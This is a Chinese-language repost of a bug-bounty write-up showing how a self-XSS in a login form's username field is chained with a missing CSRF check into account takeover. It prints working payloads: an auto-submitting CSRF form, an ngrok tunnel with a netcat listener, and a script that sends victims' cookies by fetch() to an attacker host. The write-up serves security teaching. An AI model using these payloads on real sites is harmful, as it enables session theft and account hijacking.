从Self XSS到账户接管(ATO)

admin
admin
admin
138635
文章
114
评论
2023年9月13日10:51:59评论42 views字数 2127阅读7分5秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

来源:Medium,作者:@Mostafa Elguerdawi


现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了



比方说:https: //reacted.com当我在这个网站上进行测试时,有一个登录功能,像往常一样,我尝试使用响应操作、默认凭据和 SQL 注入来绕过登录。


但没有任何作用,我决定检查源代码,发现我刚才输入的用户名打印在 value 属性中。

从Self XSS到账户接管(ATO)

我想过尝试XSS注入,所以我尝试在用户名中注入双引号(“),我发现没有对其进行过滤。

从Self XSS到账户接管(ATO)

所以,我考虑注入'<',这也可能有效。

从Self XSS到账户接管(ATO)

确实,它起作用了!


因此,我尝试注入一个完整的有效载荷:

"> <svg/onload=alert("XSS")>


而且还成功了!

从Self XSS到账户接管(ATO)

不幸的是,这是一个Self XSS


升级阶段

我运行了 BurpSuite 并在登录期间拦截了该请求。

从Self XSS到账户接管(ATO)


从请求中,我注意到没有针对 CSRF 的保护,而这是登录功能所期望的。


我尝试使用 CSRF 将 Self XSS 升级为反射 XSS。


使用的有效负载:

<html>  <body>     <form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">        <input type="hidden" name="loginName" value="&#x22;&#x20;><svg/onmouseover=alert(1)&#x20;&#x22;>           <input type="hidden" name="loginPassword" value="test"/>        <input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>                </form>        <script>           document.addEventListener('DOMContentLoaded', function(event) {            document.createElement('form').submit.call(document.getElementById('myForm'));            });</script>         </body><html>
从Self XSS到账户接管(ATO)


是的,它起作用了!


在ngrok的帮助下,我成功获取了任何人的cookie


我打开了两个终端选项卡,第一个:

ngrok http 80
从Self XSS到账户接管(ATO)


第二个:
sudo nc -nlvp 80
从Self XSS到账户接管(ATO)


我在用户名中使用了这个有效负载:
&#x22;&#x20;> <script>&#x0a;fetch(‘https://<ngrok-Domain>', { method: ‘POST’, mode: ‘no-cors’, body:document.cookie });&#x0a;</script>&#x20;&#x22;

&#x22;&#x20; 是 html 中编码的双引号和空格

此有效负载检索用户的 cookie 并将其发送给我,在netcat(nc)的帮助下,我可以获得这些cookie。


最终有效负载:

<html> <body>  <form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">   <input type="hidden" name="loginName" value="&#x22;&#x20;> <script>&#x0a;fetch('https://<ngrok-host>', { method: 'POST', mode: 'no-cors', body:document.cookie });&#x0a;</script>&#x20;&#x22;"/>   <input type="hidden" name="loginPassword" value="test"/>   <input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>  </form>  <script>   document.addEventListener('DOMContentLoaded', function(event) {    document.createElement('form').submit.call(document.getElementById('myForm'));    });</script> </body><html>
从Self XSS到账户接管(ATO)


最后,我成功获得了cookie。


关注我们

从Self XSS到账户接管(ATO) 还在等什么?赶紧点击下方名片开始学习吧!从Self XSS到账户接管(ATO)


信 安 考 证



需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜,还送【潇湘信安】知识星球1年!

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...
从Self XSS到账户接管(ATO)

推 荐 阅 读




从Self XSS到账户接管(ATO)
从Self XSS到账户接管(ATO)
从Self XSS到账户接管(ATO)

从Self XSS到账户接管(ATO)

原文始发于微信公众号(潇湘信安):从Self XSS到账户接管(ATO)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月13日10:51:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从Self XSS到账户接管(ATO)http://cn-sec.com/archives/2032443.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息